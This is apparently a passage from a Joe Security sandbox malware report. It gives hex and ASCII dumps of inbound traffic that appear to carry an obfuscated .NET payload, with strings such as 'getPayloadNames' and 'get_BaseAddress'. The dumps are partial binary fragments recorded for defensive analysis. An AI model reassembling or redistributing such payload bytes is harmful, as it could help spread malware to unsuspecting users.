2022-02-22 14:30:32 UTC 84 IN Data Raw: fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 22 00 fe 0c 19 00 7a 00 38 51 03 00 00 00 fe 0c 0d 00 fe 0c 0d 00 fe 0c 15 00 fe 0c 14 00 94 58 fe 0c 10 00 58 4a 58 fe 0c 10 00 58 4a fe 0e 11 00 20 ff ff ff ff fe 0c 12 00 3b 1e 03 00 00 fe 0c 1d 00 fe 0c 12 00 3b ff 02 00 00 fe 0c 12 00 fe 0c 0d 00 59 fe 0e 2b 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 2b 00 fe 0e 02 00 20 00 00 00 00 fe 0e 13 00 20 04 00 00 00 fe 0e 20 00 fe 0c 13 00 fe 0c 20 00 58 20 02 00 00 00 5b fe 0e 26 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 fe 0c 10 00 58 4a fe 0e 21 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 08 00 Data Ascii: X8 "z8QXXJXXJ ;;Y+ ; Y+ X [& X& ZXXJ! X& ZX
2022-02-22 14:30:32 UTC 88 IN Data Raw: ff 00 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 9a 2a 00 00 00 13 30 07 00 0e 17 00 00 61 00 00 11 fe 0d 04 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 07 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 0e 00 20 04 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 04 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 04 00 00 00 8d 03 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 15 00 fe 0e 10 00 20 06 00 00 00 8d 03 00 00 01 25 fe 0e 01 00 fe 0e 09 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 08 00 fe 0e 0c 00 20 04 00 00 00 8d 04 00 00 01 25 fe 0e 0f 00 fe 0e 13 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 12 00 fe 0c 0c 00 20 00 00 00 00 8f 04 00 00 01 fe 09 00 00 55 fe 0c 12 00 20 00 00 00 00 fe 09 01 00 a2 7f 69 00 00 04 fe 0e 0a 00 fe 0c 0a 00 Data Ascii: Y*0a% TF Z Z % % % % U i
2022-02-22 14:30:32 UTC 92 IN Data Raw: 00 58 fe 0e 00 00 38 7c f0 ff ff fe 0c 02 00 fe 0c 05 00 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 67 00 00 11 a2 fe 0c 05 00 20 01 00 00 00 58 fe 0e 05 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 2f f0 ff ff fe 0c 02 00 fe 0c 05 00 20 01 00 00 00 59 20 02 00 00 00 9c fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4c 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 63 00 00 11 df fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 c9 ef ff ff fe 0c 02 00 fe 0c 05 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 20 02 00 00 00 59 fe 0c 13 00 fe 0c 05 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 13 00 fe 0c 05 00 20 01 Data Ascii: X8| ~-XJ)g X X8/ Y Y YL~-XJ)c X8 Y Y YM
2022-02-22 14:30:32 UTC 96 IN Data Raw: 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 37 1a 00 00 20 1a 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1a 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 d7 19 00 00 38 fe 0c 00 00 38 f9 0c 00 00 20 1c 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1c 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 6c 1a 00 00 38 d3 0c 00 00 38 ce 0c 00 00 20 2b 00 00 00 fe 0c 1c 00 3f 06 02 00 00 20 2b 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 b4 1f 00 00 20 24 00 00 00 fe 0c 1c 00 3f fc 00 00 00 20 24 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 18 1d 00 00 20 20 00 00 00 fe 0c 1c 00 3f 64 00 00 00 20 20 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 45 1b 00 00 20 1e 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 1e 00 00 00 fe 0c 1c 00 3d 05 00 00 00 38 9e 1a 00 00 38 45 0c 00 00 20 1f 00 00 00 fe 0c 1c 00 3f 18 00 00 00 20 Data Ascii: =87 ? =888 ? =8l88 +? +=8 $? $=8 ?d =8E ? =88E ?
2022-02-22 14:30:32 UTC 100 IN Data Raw: 0e 0c 00 20 00 00 00 00 fe 0e 09 00 fe 0c 24 00 fe 0c 24 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0e 02 00 fe 0c 2d 00 fe 0c 21 00 fe 0c 10 00 a2 fe 0c 22 00 fe 0c 21 00 fe 0c 16 00 9e fe 0c 27 00 fe 0c 21 00 20 00 00 00 00 9e fe 0c 21 00 20 01 00 00 00 58 fe 0e 21 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 10 00 7a 00 00 dd af ea ff ff fe 0c 24 00 fe 0c 02 00 fe 0c 03 00 58 4a 58 fe 0e 02 00 dd 97 ea ff ff 00 dd 91 ea ff ff fe 0c 05 00 fe 0c 09 00 8f 04 00 00 01 e0 fe 0c 02 00 fe 0c 03 00 58 4a 54 fe 0c 0f 00 fe 0c 09 00 20 00 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 49 ea ff ff fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 Data Ascii: $$X XXJX-!"!'! ! X!8 z$XJXXJT X XI Y Y
2022-02-22 14:30:32 UTC 104 IN Data Raw: fe 0c 0b 00 fe 0c 02 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 15 00 fe 0c 09 00 14 a2 fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 65 da ff ff fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 02 00 fe 0c 03 00 58 4a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a fe 0c 02 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 58 fe 0c 24 00 58 fe 0e 02 00 fe 0c 09 00 20 01 00 00 00 59 fe 0e 09 00 dd 00 da ff ff fe 0c 0f 00 fe 0c 09 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a 74 Data Ascii: XJGT X Xe YJ XJ XXJYZ XXJX$X Y Y Y Yt Yt Yt
2022-02-22 14:30:32 UTC 108 IN Data Raw: 01 e0 fe 0c 15 00 fe 0c 09 00 20 06 00 00 00 59 9a 74 11 00 00 02 fe 0c 05 00 fe 0c 09 00 20 05 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 05 00 fe 0c 09 00 20 04 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 03 00 00 00 59 9a 74 11 00 00 1b fe 0c 05 00 fe 0c 09 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 15 00 fe 0c 09 00 20 01 00 00 00 59 9a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 1a 00 fe 0c 0b 00 fe 0c 13 00 7e 30 00 00 04 fe 0c 29 00 fe 0c 09 00 20 01 00 00 00 59 94 97 29 82 00 00 11 7e 30 00 00 04 fe 0c 02 00 fe 0c 03 00 58 4a 97 29 86 00 00 11 54 fe 0c 09 00 20 05 00 00 00 59 fe 0e 09 00 fe 0c 02 00 20 08 00 00 00 58 fe 0e 02 00 dd 36 c9 ff ff fe 0c 0f 00 fe 0c 09 00 20 02 00 00 00 59 20 00 00 00 00 9c fe Data Ascii: Yt YM YJ Yt YJ Y YJ~0) Y)~0XJ)T Y X6 Y
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 43 of 65
2022-02-22 14:30:32 UTC 112 IN Data Raw: 0e 0c 00 fe 0c 0d 00 fe 0c 0c 00 58 20 02 00 00 00 5b fe 0e 16 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 fe 0c 03 00 58 4a fe 0e 19 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 16 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 03 00 58 4a fe 0e 01 00 fe 0c 11 00 fe 0c 19 00 fe 0c 01 00 58 3c 16 00 00 00 fe 0c 19 00 fe 0c 11 00 3d 1c 00 00 00 fe 0c 16 00 38 26 00 00 00 fe 0c 16 00 20 01 00 00 00 58 fe 0e 0d 00 38 6e ff ff ff fe 0c 16 00 20 01 00 00 00 59 fe 0e 0c 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 24 00 20 35 20 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 03 00 58 4a fe 0e 20 00 fe 0c 20 00 fe 0e 17 00 20 ff ff ff ff fe 0c 17 00 40 0e 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 06 00 7a 00 fe 0c 24 00 fe 0c 17 00 Data Ascii: X [$ 5 X ZXXJ$ 5 X ZX XXJX<=8& X8n Y8[$ 5 X ZX XXJ @ z$
2022-02-22 14:30:32 UTC 116 IN Data Raw: 00 00 00 fe 06 a4 00 00 06 9b 7e 2b 00 00 04 20 01 00 00 00 fe 06 a5 00 00 06 9b 7e 2b 00 00 04 20 02 00 00 00 fe 06 a6 00 00 06 9b 7e 2b 00 00 04 20 03 00 00 00 fe 06 a7 00 00 06 9b 7e 2b 00 00 04 20 04 00 00 00 fe 06 a8 00 00 06 9b 7e 2b 00 00 04 20 05 00 00 00 fe 06 a9 00 00 06 9b 7e 2b 00 00 04 20 06 00 00 00 fe 06 aa 00 00 06 9b 7e 2b 00 00 04 20 07 00 00 00 fe 06 ab 00 00 06 9b 7e 2b 00 00 04 20 08 00 00 00 fe 06 ac 00 00 06 9b 7e 2b 00 00 04 20 09 00 00 00 fe 06 ad 00 00 06 9b 7e 2b 00 00 04 20 0a 00 00 00 fe 06 ae 00 00 06 9b 7e 2b 00 00 04 20 0b 00 00 00 fe 06 af 00 00 06 9b 7e 2b 00 00 04 20 0c 00 00 00 fe 06 b0 00 00 06 9b 7e 2b 00 00 04 20 0d 00 00 00 fe 06 b1 00 00 06 9b 7e 2b 00 00 04 20 0e 00 00 00 fe 06 b2 00 00 06 9b 2a 5a fe 09 00 00 fe Data Ascii: ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ ~+ *Z
2022-02-22 14:30:32 UTC 120 IN Data Raw: fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 14 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 97 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 4a f9 ff ff fe 0c 0d 00 fe 0c 04 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 9a 74 20 00 00 01 fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 3f 00 00 01 7e 42 00 00 04 fe 0c 0c 00 fe 0c 10 00 58 4a 97 29 98 00 00 11 a2 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 c9 f8 ff ff fe 0c 12 00 fe 0c 0c 00 fe 0c 10 00 58 4a fe 0c 0a 00 fe 0c 04 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 8a f8 ff ff fe 0c Data Ascii: Yt~BXJ) X8J Y Y Yt Yt?~BXJ) Y X8XJ Y X Y8
2022-02-22 14:30:32 UTC 124 IN Data Raw: 45 00 00 04 20 00 00 00 00 fe 06 36 01 00 06 9b 7e 45 00 00 04 20 01 00 00 00 fe 06 37 01 00 06 9b 2a 2a fe 09 00 00 28 6b 00 00 0a 2a 00 00 00 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 46 00 00 04 7e 46 00 00 04 20 00 00 00 00 fe 06 39 01 00 06 9b 2a 1a 7e 44 00 00 04 2a 13 30 03 00 21 00 00 00 00 00 00 00 20 01 00 00 00 8d 06 00 00 01 80 47 00 00 04 7e 47 00 00 04 20 00 00 00 00 fe 06 3b 01 00 06 9b 2a 00 00 00 13 30 05 00 f5 02 00 00 a0 00 00 11 fe 0d 02 00 25 20 01 00 00 00 54 46 fe 0e 0c 00 fe 0c 0c 00 20 04 00 00 00 5a fe 0e 0a 00 fe 0c 0c 00 20 08 00 00 00 5a fe 0e 00 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 04 00 00 Data Ascii: E 6~E 7**(k*0! F~F 9*~D*0! G~G ;*0% TF Z Z
2022-02-22 14:30:32 UTC 128 IN Data Raw: 1d 1d 00 00 00 ff ff ff ff ff ff ff ff 01 01 02 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 04 00 00 00 04 04 00 00 00 05 00 00 00 70 70 00 00 00 06 00 00 00 04 04 00 00 00 07 00 00 00 01 01 00 00 00 08 00 00 00 03 03 00 00 00 09 00 00 00 03 03 00 00 00 0a 00 00 00 01 01 00 00 00 0b 00 00 00 02 02 00 00 00 0c 00 00 00 02 02 00 00 00 01 01 05 00 00 00 a5 a5 00 00 00 06 00 00 00 04 04 00 00 00 0d 00 00 00 03 03 00 00 00 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 10 00 00 00 26 26 00 00 00 00 00 00 a5 a5 00 00 00 01 11 00 00 00 fe fe 00 00 00 06 00 00 00 04 04 00 00 00 12 13 14 00 00 00 00 00 00 00 00 15 0e 00 00 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 16 00 00 00 fa fa 00 00 00 00 00 00 e7 e7 00 00 00 06 00 00 00 04 04 00 00 00 17 00 Data Ascii: pp&&
2022-02-22 14:30:32 UTC 132 IN Data Raw: 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 01 02 00 00 00 00 00 00 00 00 04 00 00 00 03 03 00 00 00 13 00 00 00 c2 c2 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 02 02 00 00 00 02 03 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 05 5d 00 00 00 00 00 00 9a 9a 00 00 00 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 6f 5d 6e 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 31 5d 38 5d 33 5d 2f 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d 38 5d 36 5d 18 5d 2b 5d 38 5d 2f 5d 24 5d 29 5d 35 5d 34 5d 33 5d 3a 5d 09 5d 32 5d 32 5d 31 5d 3f 5d 3c 5d 2f 5d Data Ascii: ]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]o]n]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]1]8]3]/]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]8]6]]+]8]/]$])]5]4]3]:]]2]2]1]?]<]/]
2022-02-22 14:30:32 UTC 136 IN Data Raw: 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0b 65 0a 65 26 65 01 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 04 65 00 65 17 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 0d 65 31 65 11 65 32 65 12 65 30 65 1c 65 34 65 01 65 36 65 30 65 0c 65 29 65 2f 65 34 65 31 65 22 65 11 65 00 65 22 65 65 65 07 01 05 00 00 00 21 21 00 00 00 02 00 00 00 01 01 00 00 00 06 b0 00 00 00 00 00 00 20 20 00 00 00 e7 b0 c7 b0 e5 b0 c9 b0 e1 b0 d4 b0 e3 b0 e5 b0 d9 b0 fc b0 fa b0 e1 b0 e4 b0 f7 b0 c4 b0 b0 b0 07 01 05 00 00 00 21 21 00 00 00 08 00 00 00 00 00 00 00 00 09 00 00 00 11 11 00 00 00 02 00 00 00 02 02 00 00 00 03 04 00 00 00 21 21 00 00 00 05 00 00 00 21 21 00 00 00 02 00 Data Ascii: ee)e/e4e1e"eeee&ee2ee0ee4ee6e0ee)e/e4e1e"eeeee2ee0ee4ee6e0ee)e/e4e1e"eee1ee2ee0ee4ee6e0ee)e/e4e1e"eee"eee!! !!!!!!
2022-02-22 14:30:32 UTC 140 IN Data Raw: 1b 00 00 00 4a 00 00 00 1c 1c 00 00 00 02 00 00 00 00 00 00 00 00 2b 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 14 77 77 14 00 00 00 00 14 6d 6d 14 00 00 34 00 00 00 14 14 00 00 00 35 01 39 00 00 00 04 04 00 00 00 39 00 00 00 06 06 00 00 00 4b 00 00 14 ea ea 14 00 00 00 00 14 9b 9b 14 00 00 4c 00 00 00 0b 0b 00 00 00 23 00 00 00 0a 0a 00 00 00 00 00 00 0d 0d 00 00 00 48 00 00 00 1a 1a 00 00 00 39 00 00 00 06 06 00 00 00 4d 00 00 00 1d 1d 00 00 00 02 00 00 00 00 00 00 00 00 4b 00 00 14 fc fc 14 00 00 00 00 14 ea ea 14 00 00 02 00 00 00 00 00 00 00 00 43 00 00 15 05 05 15 00 00 02 00 00 00 01 01 00 00 00 01 2c 00 00 00 04 04 00 00 00 2d 00 00 00 04 04 00 00 00 2e 00 00 15 60 60 15 00 00 00 00 15 56 56 15 00 00 74 00 00 15 56 56 15 00 00 Data Ascii: J+,-.wwmm4599KL#H9MKC,-.``VVtVV
2022-02-22 14:30:32 UTC 144 IN Data Raw: 23 06 00 01 00 0a 05 0e 00 d3 3a 5a 2a 06 00 1e 00 0a 05 06 00 f5 2e 6c 35 06 00 1d 0d b9 23 06 00 e2 1d b9 23 0e 00 bf 0f 5a 2a 0e 00 5f 16 5a 2a 0e 00 b5 0a 5a 2a 0e 00 de 38 5a 2a 06 00 2c 00 0a 05 06 00 11 0d 6c 35 06 00 45 00 b9 23 16 00 12 0d 6a 2a 06 00 33 18 00 31 06 00 6a 16 00 31 12 00 b8 26 d6 2f 06 00 34 15 6c 35 12 00 84 0f d6 2f 06 00 be 20 ba 30 06 00 b6 15 b9 23 0a 00 3e 35 d9 30 06 00 f5 1c 82 3c 06 00 b0 2a b9 23 06 00 20 3e b9 23 0a 00 b7 36 d9 30 06 00 5e 2d b9 23 06 00 a3 2b b9 23 0a 00 97 04 d9 30 0a 00 23 34 25 05 06 00 ad 15 b9 23 06 00 8b 3a b9 23 06 00 98 1e b9 23 06 00 ea 12 b9 23 06 00 be 2b 65 31 06 00 cf 28 76 26 06 00 78 3f a6 26 12 00 4b 15 36 26 12 00 56 15 36 26 06 00 1c 19 a6 26 06 00 46 17 a6 26 06 00 ba 17 a6 26 06 00 Data Ascii: #:Z*.l5##Z*_Z*Z*8Z*,l5E#j*31j1&/4l5/ 0#>50<*# >#60^-#+#0#4%#:###+e1(v&x?&K6&V6&&F&&
2022-02-22 14:30:32 UTC 148 IN Data Raw: 85 51 00 00 00 00 16 00 9b 29 ef 02 35 00 20 e9 01 00 00 00 11 00 53 06 40 00 35 00 4d e9 01 00 00 00 16 00 16 2a c8 06 35 00 5c e9 01 00 00 00 16 00 90 05 0f 09 35 00 b5 23 00 00 00 00 16 00 51 10 35 00 35 00 6b e9 01 00 00 00 16 00 08 22 15 09 35 00 76 e9 01 00 00 00 16 00 d8 1f 1d 09 35 00 81 e9 01 00 00 00 16 00 ff 1d 25 09 35 00 5a 50 00 00 00 00 16 00 c6 20 23 02 35 00 8c e9 01 00 00 00 16 00 41 0d 2b 09 35 00 97 e9 01 00 00 00 16 00 71 28 32 09 35 00 a2 e9 01 00 00 00 16 00 c3 04 37 09 35 00 b5 e9 01 00 00 00 16 00 e5 2e 3e 09 35 00 0e 23 01 00 00 00 16 00 e0 27 2a 04 35 00 19 23 01 00 00 00 16 00 77 38 30 04 35 00 c0 e9 01 00 00 00 16 00 85 0c 45 09 35 00 c7 e9 01 00 00 00 16 00 a8 3e 4a 09 35 00 d8 e9 01 00 00 00 11 00 d0 3b 40 00 35 00 f3 ea 01 Data Ascii: Q)5 S@5M*5\5#Q55k"5v5%5ZP #5A+5q(2575.>5#'*5#w805E5>J5;@5
TimestampkBytestransferred
Direction Data
Copyright Joe Security LLC 2022 Page 44 of 65
2022-02-22 14:30:32 UTC 152 IN Data Raw: 02 a3 00 2b 00 7a 00 c3 00 2b 00 7a 00 c3 00 03 01 96 03 c9 00 f3 01 6f 00 e3 00 2b 00 7a 00 e3 00 fb 01 6f 00 e3 00 1b 00 6f 00 e9 00 f3 01 6f 00 03 01 fb 01 6f 00 03 01 1b 00 6f 00 03 01 2b 00 7a 00 09 01 f3 01 6f 00 20 01 3b 00 6f 00 20 01 2b 00 7a 00 29 01 2b 00 08 0e 49 01 2b 00 08 0e 89 01 8b 00 08 0f a0 01 1b 00 6f 00 c0 01 3b 00 6f 00 e0 01 3b 00 6f 00 00 02 3b 00 6f 00 20 02 3b 00 6f 00 e3 02 9b 00 6f 00 e3 02 1b 00 6f 00 e3 02 fb 01 6f 00 e3 02 33 00 17 0e e3 02 93 00 6f 00 03 03 33 00 ae 0e 03 03 fb 01 6f 00 03 03 2b 00 08 0e 23 03 1b 00 6f 00 23 03 93 00 6f 00 23 03 9b 00 6f 00 23 03 fb 01 6f 00 60 04 2b 00 7a 00 60 04 3b 00 6f 00 80 04 3b 00 6f 00 80 04 2b 00 7a 00 a0 04 3b 00 6f 00 a0 04 2b 00 7a 00 c0 04 2b 00 7a 00 c0 04 3b 00 6f 00 e0 04 Data Ascii: +z+zo+zooooo+zo ;o +z)+I+o;o;o;o ;oooo3o3o+#o#o#o#o`+z`;o;o+z;o+z+z;o
2022-02-22 14:30:32 UTC 156 IN Data Raw: 65 67 69 73 74 72 61 74 69 6f 6e 53 65 72 76 69 63 65 73 54 69 63 6b 73 50 65 72 53 65 63 6f 6e 64 00 41 64 64 4f 70 63 6f 64 65 67 65 74 53 65 63 6f 6e 64 00 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 46 6f 75 6e 64 00 43 72 65 61 74 65 53 69 67 6e 61 74 75 72 65 52 65 73 6f 75 72 63 65 4d 61 6e 61 67 65 72 4e 65 75 74 72 61 6c 52 65 73 6f 75 72 63 65 73 4e 6f 74 46 6f 75 6e 64 00 52 65 6d 6f 76 65 4f 6e 4c 6f 67 4d 65 73 73 61 67 65 67 65 74 49 73 47 65 6e 65 72 69 63 4d 65 74 68 6f 64 00 50 72 65 63 6f 6e 64 69 74 69 6f 6e 49 6e 76 6f 6b 65 4d 65 74 68 6f 64 00 54 61 72 67 65 74 4d 65 74 68 6f 64 00 53 65 74 44 61 74 61 4f 65 6d 50 65 72 69 6f 64 00 57 69 6e 64 6f Data Ascii: egistrationServicesTicksPerSecondAddOpcodegetSecondsetSoapActionResourceManagerNeutralResourcesFoundCreateSignatureResourceManagerNeutralResourcesNotFoundRemoveOnLogMessagegetIsGenericMethodPreconditionInvokeMethodTargetMethodSetDataOemPeriodWindo
2022-02-22 14:30:32 UTC 160 IN Data Raw: 4d 75 6c 74 69 63 61 73 74 44 65 6c 65 67 61 74 65 00 43 6f 64 65 50 61 67 65 49 73 55 6e 6b 6e 6f 77 6e 53 75 72 72 6f 67 61 74 65 00 55 6e 6b 6e 6f 77 6e 48 6f 73 74 43 61 6e 47 65 6e 65 72 61 74 65 00 44 65 6c 65 67 61 74 65 41 73 79 6e 63 53 74 61 74 65 00 45 64 69 74 6f 72 42 72 6f 77 73 61 62 6c 65 53 74 61 74 65 00 44 69 67 69 74 53 75 62 73 74 69 74 75 74 69 6f 6e 67 65 74 41 73 73 65 6d 62 6c 79 49 73 50 72 69 76 61 74 65 00 53 74 72 69 6e 67 54 6f 48 47 6c 6f 62 61 6c 55 6e 69 56 6f 6c 61 74 69 6c 65 57 72 69 74 65 00 58 41 74 74 72 69 62 75 74 65 00 43 6f 6d 70 69 6c 65 72 47 65 6e 65 72 61 74 65 64 41 74 74 72 69 62 75 74 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 48 65 6c 70 4b 65 79 77 6f 72 64 41 74 74 72 69 62 75 74 65 00 47 65 6e 65 Data Ascii: MulticastDelegateCodePageIsUnknownSurrogateUnknownHostCanGenerateDelegateAsyncStateEditorBrowsableStateDigitSubstitutiongetAssemblyIsPrivateStringToHGlobalUniVolatileWriteXAttributeCompilerGeneratedAttributeGuidAttributeHelpKeywordAttributeGene
2022-02-22 14:30:32 UTC 164 IN Data Raw: 69 6f 6e 00 53 79 73 74 65 6d 2e 43 6f 6e 66 69 67 75 72 61 74 69 6f 6e 00 41 64 64 41 6e 6e 6f 74 61 74 69 6f 6e 00 41 70 70 65 6e 64 41 6c 6c 4c 69 6e 65 73 54 6f 6b 65 6e 45 6c 65 76 61 74 69 6f 6e 00 53 79 73 74 65 6d 2e 47 6c 6f 62 61 6c 69 7a 61 74 69 6f 6e 00 43 75 72 72 65 6e 74 54 68 72 65 61 64 73 65 74 53 6f 61 70 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 50 72 6f 63 65 73 73 4d 6f 64 75 6c 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 43 6c 65 61 6e 55 70 4d 61 6e 61 67 65 64 44 61 74 61 4e 6f 64 65 4b 65 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 65 6e 65 72 61 74 65 52 65 66 65 72 65 6e 63 65 4b 65 79 43 6f 6c 6c 65 63 74 69 6f 6e 00 44 6f 4e 6f 74 41 64 64 72 4f 66 43 73 70 50 61 72 65 6e 74 57 69 6e 64 6f Data Ascii: ionSystem.ConfigurationAddAnnotationAppendAllLinesTokenElevationSystem.GlobalizationCurrentThreadsetSoapActionSystem.ReflectionProcessModuleCollectionCleanUpManagedDataNodeKeyValueCollectionGenerateReferenceKeyCollectionDoNotAddrOfCspParentWindo
2022-02-22 14:30:32 UTC 168 IN Data Raw: 4f 70 65 72 61 74 6f 72 73 00 47 65 74 43 75 72 72 65 6e 74 50 72 6f 63 65 73 73 00 70 72 6f 63 65 73 73 00 67 65 74 50 61 79 6c 6f 61 64 4e 61 6d 65 73 61 64 64 43 61 6e 63 65 6c 4b 65 79 50 72 65 73 73 00 67 65 74 5f 42 61 73 65 41 64 64 72 65 73 73 00 61 64 64 72 65 73 73 00 44 61 79 6c 69 67 68 74 44 65 6c 74 61 67 65 74 44 69 73 61 6c 6c 6f 77 42 69 6e 64 69 6e 67 52 65 64 69 72 65 63 74 73 00 43 6f 6e 74 61 69 6e 73 4e 6f 6e 43 6f 64 65 41 63 63 65 73 73 50 65 72 6d 69 73 73 69 6f 6e 73 67 65 74 4e 61 6d 65 64 50 65 72 6d 69 73 73 69 6f 6e 53 65 74 73 00 49 53 4f 43 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 47 65 74 4f 62 6a 65 63 74 73 46 6f 72 4e 61 74 69 76 65 56 61 72 69 61 6e 74 73 00 42 67 65 74 44 65 63 6c 61 72 65 64 45 76 65 6e 74 73 00 67 65 Data Ascii: 